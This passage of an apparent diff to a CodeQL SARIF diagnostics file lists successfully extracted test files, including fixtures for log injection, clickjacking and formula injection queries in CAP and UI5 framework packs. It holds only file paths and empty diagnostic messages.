"%SRCROOT%", + "index" : 2 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + 
}, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 88 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 89 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 90 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 91 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + 
"index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 92 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 93 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 94 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 95 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + 
"descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 96 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 97 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 98 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 99 + } + } + } 
], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 100 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 101 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 102 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 104 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 105 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + 
"locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 107 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 109 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 110 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { 
+ "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 111 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 112 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 113 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : 
{ + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 115 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 116 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 117 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 118 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 119 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 120 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 121 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + 
"uriBaseId" : "%SRCROOT%", + "index" : 123 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uriBaseId" : "%SRCROOT%", + "index" : 124 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", + "uriBaseId" : "%SRCROOT%", + "index" : 125 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 126 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 127 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : 
"js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 128 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 129 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 130 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 131 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, 
+ "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 132 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 133 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 134 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 135 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 137 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 139 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" 
: { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 140 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 141 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 142 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 143 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + 
"locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 144 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 146 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 147 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + 
"toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 148 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 149 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : 